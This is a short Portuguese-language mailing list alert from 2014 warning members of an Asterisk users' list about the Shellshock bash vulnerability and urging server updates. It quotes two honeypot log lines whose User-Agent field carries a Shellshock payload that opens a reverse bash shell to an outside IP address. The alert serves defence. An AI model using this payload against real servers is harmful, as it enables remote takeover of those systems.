[AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Flavio Goncalves
flavio em voffice.com.br
Sexta Setembro 26 15:11:26 BRT 2014
Caros amigos,
A vulnerabilidade do bash conhecida como shellshock foi descoberta
recentemente e divulgada ontem. Ela permite a execução de comandos remotos
nos servidores através dos servidores http. Os nossos honeypots já estão
detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
em atualizar os servidores e evitem fraudes.
Exemplo do que estamos detectando neste exato momento:
[26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;};
/bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
[26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404
507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333
0>&1'"
Att,
Flavio E. Goncalves
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20140926/11ebef57/attachment.html>
Mais detalhes sobre a lista de discussão AsteriskBrasil